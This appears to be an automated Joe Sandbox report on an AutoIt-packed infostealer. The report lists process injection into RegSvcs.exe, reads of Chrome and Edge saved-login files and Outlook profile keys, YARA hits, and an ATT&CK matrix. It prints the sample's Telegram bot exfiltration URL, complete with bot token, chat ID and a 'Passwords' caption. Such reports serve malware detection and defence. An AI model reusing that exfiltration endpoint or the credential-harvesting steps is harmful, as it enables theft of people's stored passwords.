                Source: C:\Users\user\Desktop\nfKqna8HuC.exeCode function: 0_2_0065A66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_0065A66C
                Source: C:\Users\user\Desktop\nfKqna8HuC.exeCode function: 0_2_006671FA AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_006671FA
                Source: nfKqna8HuC.exeBinary or memory string: Shell_TrayWnd
                Source: nfKqna8HuC.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndTHISREMOVEblankinfoquestionstopwarning
                Source: C:\Users\user\Desktop\nfKqna8HuC.exeCode function: 0_2_006465C4 cpuid 0_2_006465C4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: GetLocaleInfoA,2_2_00417A20
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\nfKqna8HuC.exeCode function: 0_2_0067091D GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,__wsplitpath,_wcscat,_wcscat,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,_wcscpy,SetCurrentDirectoryW,0_2_0067091D
                Source: C:\Users\user\Desktop\nfKqna8HuC.exeCode function: 0_2_0069B340 GetUserNameW,0_2_0069B340
                Source: C:\Users\user\Desktop\nfKqna8HuC.exeCode function: 0_2_00651E8E __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_00651E8E
                Source: C:\Users\user\Desktop\nfKqna8HuC.exeCode function: 0_2_0063DDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_0063DDC0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 2.2.RegSvcs.exe.408e790.8.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.RegSvcs.exe.2c21bc6.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.RegSvcs.exe.4065570.7.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.RegSvcs.exe.2fb0000.5.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.RegSvcs.exe.4066458.6.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.RegSvcs.exe.2fb0000.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.RegSvcs.exe.2c21bc6.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.RegSvcs.exe.2e20ee8.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.RegSvcs.exe.4066458.6.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.RegSvcs.exe.2c20cde.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.RegSvcs.exe.2e20ee8.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.RegSvcs.exe.4065570.7.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.RegSvcs.exe.408e790.8.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.RegSvcs.exe.2c20cde.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.RegSvcs.exe.2e20000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.RegSvcs.exe.2e20000.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000002.00000002.3303343228.0000000002FB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.3302928287.0000000002E20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.3304747884.0000000004061000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.3302818296.0000000002BE0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.3303484774.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 5596, type: MEMORYSTR
                Source: Yara matchFile source: 2.2.RegSvcs.exe.408e790.8.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.RegSvcs.exe.2c21bc6.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.RegSvcs.exe.4065570.7.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.RegSvcs.exe.2fb0000.5.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.RegSvcs.exe.4066458.6.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.RegSvcs.exe.2fb0000.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.RegSvcs.exe.2c21bc6.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.RegSvcs.exe.2e20ee8.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.RegSvcs.exe.4066458.6.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.RegSvcs.exe.2c20cde.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.RegSvcs.exe.2e20ee8.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.RegSvcs.exe.4065570.7.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.RegSvcs.exe.408e790.8.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.RegSvcs.exe.2c20cde.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.RegSvcs.exe.2e20000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.RegSvcs.exe.2e20000.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000002.00000002.3303343228.0000000002FB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.3302928287.0000000002E20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.3304747884.0000000004061000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.3302818296.0000000002BE0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 2.2.RegSvcs.exe.408e790.8.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.RegSvcs.exe.2c21bc6.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.RegSvcs.exe.4065570.7.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.RegSvcs.exe.2fb0000.5.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.RegSvcs.exe.4066458.6.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.RegSvcs.exe.2fb0000.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.RegSvcs.exe.2c21bc6.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.RegSvcs.exe.2e20ee8.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.RegSvcs.exe.4066458.6.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.RegSvcs.exe.2c20cde.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.RegSvcs.exe.2e20ee8.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.RegSvcs.exe.4065570.7.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.RegSvcs.exe.408e790.8.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.RegSvcs.exe.2c20cde.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.RegSvcs.exe.2e20000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.RegSvcs.exe.2e20000.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000002.00000002.3303343228.0000000002FB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.3302928287.0000000002E20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.3304747884.0000000004061000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.3302818296.0000000002BE0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.3303484774.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 5596, type: MEMORYSTR
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: nfKqna8HuC.exeBinary or memory string: WIN_81
                Source: nfKqna8HuC.exeBinary or memory string: WIN_XP
                Source: nfKqna8HuC.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 12, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubytep
                Source: nfKqna8HuC.exeBinary or memory string: WIN_XPe
                Source: nfKqna8HuC.exeBinary or memory string: WIN_VISTA
                Source: nfKqna8HuC.exeBinary or memory string: WIN_7
                Source: nfKqna8HuC.exeBinary or memory string: WIN_8
                Source: Yara matchFile source: 2.2.RegSvcs.exe.408e790.8.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.RegSvcs.exe.2c21bc6.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.RegSvcs.exe.4065570.7.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.RegSvcs.exe.2fb0000.5.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.RegSvcs.exe.4066458.6.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.RegSvcs.exe.2fb0000.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.RegSvcs.exe.2c21bc6.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.RegSvcs.exe.2e20ee8.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.RegSvcs.exe.4066458.6.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.RegSvcs.exe.2c20cde.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.RegSvcs.exe.2e20ee8.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.RegSvcs.exe.4065570.7.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.RegSvcs.exe.408e790.8.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.RegSvcs.exe.2c20cde.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.RegSvcs.exe.2e20000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.RegSvcs.exe.2e20000.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000002.00000002.3303343228.0000000002FB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.3302928287.0000000002E20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.3304747884.0000000004061000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.3302818296.0000000002BE0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.3303484774.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 5596, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: 2.2.RegSvcs.exe.408e790.8.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.RegSvcs.exe.2c21bc6.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.RegSvcs.exe.4065570.7.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.RegSvcs.exe.2fb0000.5.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.RegSvcs.exe.4066458.6.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.RegSvcs.exe.2fb0000.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.RegSvcs.exe.2c21bc6.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.RegSvcs.exe.2e20ee8.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.RegSvcs.exe.4066458.6.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.RegSvcs.exe.2c20cde.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.RegSvcs.exe.2e20ee8.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.RegSvcs.exe.4065570.7.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.RegSvcs.exe.408e790.8.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.RegSvcs.exe.2c20cde.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.RegSvcs.exe.2e20000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.RegSvcs.exe.2e20000.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000002.00000002.3303343228.0000000002FB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.3302928287.0000000002E20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.3304747884.0000000004061000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.3302818296.0000000002BE0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.3303484774.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 5596, type: MEMORYSTR
                Source: Yara matchFile source: 2.2.RegSvcs.exe.408e790.8.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.RegSvcs.exe.2c21bc6.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.RegSvcs.exe.4065570.7.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.RegSvcs.exe.2fb0000.5.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.RegSvcs.exe.4066458.6.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.RegSvcs.exe.2fb0000.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.RegSvcs.exe.2c21bc6.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.RegSvcs.exe.2e20ee8.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.RegSvcs.exe.4066458.6.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.RegSvcs.exe.2c20cde.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.RegSvcs.exe.2e20ee8.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.RegSvcs.exe.4065570.7.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.RegSvcs.exe.408e790.8.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.RegSvcs.exe.2c20cde.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.RegSvcs.exe.2e20000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.RegSvcs.exe.2e20000.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000002.00000002.3303343228.0000000002FB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.3302928287.0000000002E20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.3304747884.0000000004061000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.3302818296.0000000002BE0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 2.2.RegSvcs.exe.408e790.8.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.RegSvcs.exe.2c21bc6.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.RegSvcs.exe.4065570.7.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.RegSvcs.exe.2fb0000.5.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.RegSvcs.exe.4066458.6.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.RegSvcs.exe.2fb0000.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.RegSvcs.exe.2c21bc6.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.RegSvcs.exe.2e20ee8.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.RegSvcs.exe.4066458.6.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.RegSvcs.exe.2c20cde.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.RegSvcs.exe.2e20ee8.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.RegSvcs.exe.4065570.7.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.RegSvcs.exe.408e790.8.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.RegSvcs.exe.2c20cde.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.RegSvcs.exe.2e20000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.RegSvcs.exe.2e20000.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000002.00000002.3303343228.0000000002FB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.3302928287.0000000002E20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.3304747884.0000000004061000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.3302818296.0000000002BE0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.3303484774.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 5596, type: MEMORYSTR
                Source: C:\Users\user\Desktop\nfKqna8HuC.exeCode function: 0_2_00678C4F socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_00678C4F
                Source: C:\Users\user\Desktop\nfKqna8HuC.exeCode function: 0_2_0067923B socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_0067923B
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire Infrastructure2
                Valid Accounts
                2
                Native API
                1
                DLL Side-Loading
                1
                Exploitation for Privilege Escalation
                11
                Disable or Modify Tools
                1
                OS Credential Dumping
                2
                System Time Discovery
                Remote Services1
                Archive Collected Data
                1
                Web Service
                Exfiltration Over Other Network Medium1
                System Shutdown/Reboot
                CredentialsDomainsDefault AccountsScheduled Task/Job2
                Valid Accounts
                1
                DLL Side-Loading
                1
                Deobfuscate/Decode Files or Information
                21
                Input Capture
                1
                Account Discovery
                Remote Desktop Protocol1
                Data from Local System
                2
                Ingress Tool Transfer
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)2
                Valid Accounts
                3
                Obfuscated Files or Information
                Security Account Manager1
                File and Directory Discovery
                SMB/Windows Admin Shares1
                Email Collection
                11
                Encrypted Channel
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook21
                Access Token Manipulation
                1
                DLL Side-Loading
                NTDS137
                System Information Discovery
                Distributed Component Object Model21
                Input Capture
                3
                Non-Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script212
                Process Injection
                2
                Valid Accounts
                LSA Secrets141
                Security Software Discovery
                SSH3
                Clipboard Data
                14
                Application Layer Protocol
                Scheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts21
                Access Token Manipulation
                Cached Domain Credentials2
                Process Discovery
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items212
                Process Injection
                DCSync1
                Application Window Discovery
                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
                System Owner/User Discovery
                Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
                System Network Configuration Discovery
                Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                nfKqna8HuC.exe57%VirustotalBrowse
                nfKqna8HuC.exe83%ReversingLabsWin32.Trojan.AutoitInject
                nfKqna8HuC.exe100%Joe Sandbox ML
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                NameIPActiveMaliciousAntivirus DetectionReputation
                api.telegram.org
                149.154.167.220
                truefalse
                  high
                  checkip.dyndns.com
                  158.101.44.242
                  truefalse
                    high
                    checkip.dyndns.org
                    unknown
                    unknownfalse
                      high
                      NameMaliciousAntivirus DetectionReputation
                      http://checkip.dyndns.org/false
                        high
                        https://api.telegram.org/bot8152393919:AAFcv9D2OhgJkwW5R_jm9t4Pm6asb_5vQdk/sendDocument?chat_id=1437092720&caption=user%20/%20Passwords%20/%208.46.123.189false
                          high
                          NameSourceMaliciousAntivirus DetectionReputation
                          http://checkip.dyndns.orgRegSvcs.exe, 00000002.00000002.3303484774.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3303484774.0000000003140000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3303484774.000000000314C000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            http://checkip.dyndns.comRegSvcs.exe, 00000002.00000002.3303484774.000000000314C000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              https://api.telegram.orgRegSvcs.exe, 00000002.00000002.3303484774.00000000031F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                https://api.telegram.org/botRegSvcs.exe, 00000002.00000002.3303484774.00000000031F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  http://api.telegram.orgRegSvcs.exe, 00000002.00000002.3303484774.000000000326A000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameRegSvcs.exe, 00000002.00000002.3303484774.00000000030C9000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://api.telegram.org/bot-/sendDocument?chat_id=RegSvcs.exe, 00000002.00000002.3302928287.0000000002E20000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3303343228.0000000002FB0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3304747884.0000000004061000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3302818296.0000000002BE0000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        http://checkip.dyndns.org/qRegSvcs.exe, 00000002.00000002.3302928287.0000000002E20000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3303343228.0000000002FB0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3304747884.0000000004061000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3302818296.0000000002BE0000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          https://api.telegram.org/bot8152393919:AAFcv9D2OhgJkwW5R_jm9t4Pm6asb_5vQdk/sendDocument?chat_id=1437RegSvcs.exe, 00000002.00000002.3303484774.00000000031F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://reallyfreegeoip.org/xml/RegSvcs.exe, 00000002.00000002.3302928287.0000000002E20000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3303343228.0000000002FB0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3304747884.0000000004061000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3302818296.0000000002BE0000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3303484774.000000000314C000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              • No. of IPs < 25%
                                              • 25% < No. of IPs < 50%
                                              • 50% < No. of IPs < 75%
                                              • 75% < No. of IPs
                                              IPDomainCountryFlagASNASN NameMalicious
                                              149.154.167.220
                                              api.telegram.orgUnited Kingdom
                                              62041TELEGRAMRUfalse
                                              158.101.44.242
                                              checkip.dyndns.comUnited States
                                              31898ORACLE-BMC-31898USfalse
                                              Joe Sandbox version:42.0.0 Malachite
                                              Analysis ID:1589102
                                              Start date and time:2025-01-11 09:36:05 +01:00
                                              Joe Sandbox product:CloudBasic
                                              Overall analysis duration:0h 6m 8s
                                              Hypervisor based Inspection enabled:false
                                              Report type:full
                                              Cookbook file name:default.jbs
                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                              Number of analysed new started processes analysed:5
                                              Number of new started drivers analysed:0
